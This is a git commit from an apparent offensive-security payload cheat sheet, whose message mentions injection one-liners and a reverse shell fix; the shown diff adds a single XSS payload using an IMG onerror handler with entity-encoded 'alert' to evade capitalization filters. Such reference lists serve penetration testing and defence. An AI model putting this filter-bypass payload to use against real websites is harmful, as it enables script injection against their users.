Expression Language Injection One-Liners; XSS Payload; Fixed Linux Python IPv6 Reverse Shell Payload

This commit is contained in:
Jeffrey Cap
2021-08-23 14:41:40 -05:00
parent fde99044c5
commit 9bde75b32d
3 changed files with 17 additions and 1 deletions

View File

@@ -230,6 +230,12 @@ e.g: 14.rs/#alert(document.domain)
Use CTRL+SHIFT+X to trigger the onclick event
```
### XSS when payload is reflected capitalized
```javascript
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
```
### DOM based XSS
Based on a DOM XSS sink.